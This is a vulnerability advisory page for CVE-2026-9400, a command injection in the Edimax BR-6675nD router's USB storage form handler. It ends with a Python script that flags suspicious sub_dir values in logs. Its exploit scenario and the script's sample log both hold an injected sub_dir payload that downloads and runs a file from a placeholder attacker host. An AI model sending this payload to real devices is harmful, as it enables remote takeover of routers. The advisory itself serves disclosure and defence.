
Edimax BR-6675nD CVE-2026-9400

EUVD-2026-31603 | LOW | Command Injection (CWE-77) | 2026-05-24 | VulDB | GHSA-53r7-38m4-hpmp
CVSS 4.0: 2.1 (NVD)

Severity by source

NVD (primary): 2.1 LOW
CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X

Primary rating from NVD · only source for this CVE.

CVSS Vector (NVD)

  • Attack Vector: Network
  • Attack Complexity: Low
  • Privileges Required: Low
  • User Interaction: None
  • Scope: X

Lifecycle Timeline

  • Jun 08, 2026 - 13:26 (vuln.today): Analysis Generated
  • May 26, 2026 - 19:37 (NVD): Severity Changed, MEDIUM to LOW
  • May 26, 2026 - 19:37 (NVD): CVSS changed, 6.3 (MEDIUM) to 2.1 (LOW)

Description (CVE.org)

A flaw has been found in Edimax BR-6675nD 1.12. This issue affects the function formUSBStorage of the file /goform/formUSBStorage of the component POST Request Handler. Executing a manipulation of the argument sub_dir can lead to command injection. It is possible to launch the attack remotely. The exploit has been published and may be used. The vendor was contacted early about this disclosure but did not respond in any way.

Analysis (AI)

Command injection in the Edimax BR-6675nD 1.12 router's web management interface allows remote authenticated attackers to execute arbitrary OS commands by manipulating the sub_dir parameter of POST requests to the /goform/formUSBStorage endpoint. The vulnerability stems from unsanitized input passed directly to a system-level command in the formUSBStorage function (CWE-77). …


Attack Chain (AI, derived)

Hypothetical attack flow derived from CVE metadata

  • Access: Identify exposed Edimax BR-6675nD management interface
  • Delivery: Authenticate with low-privilege or default credentials
  • Exploit: Send crafted POST to /goform/formUSBStorage with malicious sub_dir value
  • Execution: Router passes unsanitized input to shell command
  • Impact: Arbitrary OS commands execute on device

Vulnerability Assessment (AI)

Exploitation: Exploitation requires low-privilege authentication (PR:L per CVSS 4.0 vector) to the Edimax BR-6675nD web management interface - any valid login credential suffices; administrator-level access is not required per the CVSS rating. …

Risk Assessment: The published CVSS 4.0 score of 2.1 is a notable outlier for a network-reachable command injection with a public exploit. …

Exploit Scenario: An attacker with low-privilege credentials to the Edimax BR-6675nD web management interface sends a crafted HTTP POST request to /goform/formUSBStorage with the sub_dir parameter set to a value containing shell metacharacters (e.g., sub_dir=test;wget+http://attacker/payload+-O+/tmp/x;sh+/tmp/x). The router's formUSBStorage function passes the unsanitized value directly into a shell command, executing the attacker's injected payload with the privileges of the web server process. …

Remediation: No vendor-released patch is available at time of analysis; the vendor did not respond to disclosure. …
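
With no patch available, one compensating check is to review logged POST requests to the affected endpoint for sub_dir values that are not plain directory paths. The following is an added example, not code from this advisory or from the vendor; the log line layout, the `apply` parameter and the allowlist of characters for a legitimate sub_dir are assumptions, and the sample lines are constructed.

```python
import re
from urllib.parse import unquote_plus

ENDPOINT = "/goform/formUSBStorage"  # endpoint named in the advisory
PARAM = "sub_dir"                    # parameter named in the advisory
# Assumption: a legitimate sub_dir is a plain directory path.
SAFE_VALUE = re.compile(r"[A-Za-z0-9_./ -]*")

# Constructed sample lines: "<time> <client> <method> <path> <form body>"
SAMPLE_LOG = """\
2026-06-01T10:00:01Z 192.0.2.10 POST /goform/formUSBStorage sub_dir=photos%2F2026&apply=1
2026-06-01T10:00:07Z 192.0.2.44 POST /goform/formUSBStorage sub_dir=test;wget+http://attacker/payload+-O+/tmp/x;sh+/tmp/x
2026-06-01T10:00:09Z 192.0.2.44 POST /goform/formUSBStorage apply=1&sub_dir=music%3Bls
2026-06-01T10:00:12Z 192.0.2.10 POST /goform/formOther sub_dir=a;b
2026-06-01T10:00:15Z 192.0.2.10 GET /index.asp -
"""

def param_values(body, name):
    """Return every decoded value of `name` in a urlencoded form body."""
    values = []
    for pair in body.split("&"):  # split only on '&' so ';' stays in the value
        key, _, raw = pair.partition("=")
        if unquote_plus(key) == name:
            values.append(unquote_plus(raw))  # decode %XX and '+' before checking
    return values

def suspicious_requests(log_text):
    """Return (time, client, decoded value) for sub_dir values outside the allowlist."""
    hits = []
    for line in log_text.splitlines():
        parts = line.split(" ", 4)
        if len(parts) != 5:
            continue  # not in the assumed layout
        when, client, method, path, body = parts
        if method != "POST" or path.split("?", 1)[0] != ENDPOINT:
            continue
        for value in param_values(body, PARAM):  # repeated parameters are all checked
            if not SAFE_VALUE.fullmatch(value):
                hits.append((when, client, value))
    return hits

if __name__ == "__main__":
    for when, client, value in suspicious_requests(SAMPLE_LOG):
        print(f"{when} {client} suspicious {PARAM}={value!r}")
```

The check is an allowlist on the decoded value, so percent-encoded metacharacters are caught the same way as literal ones.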
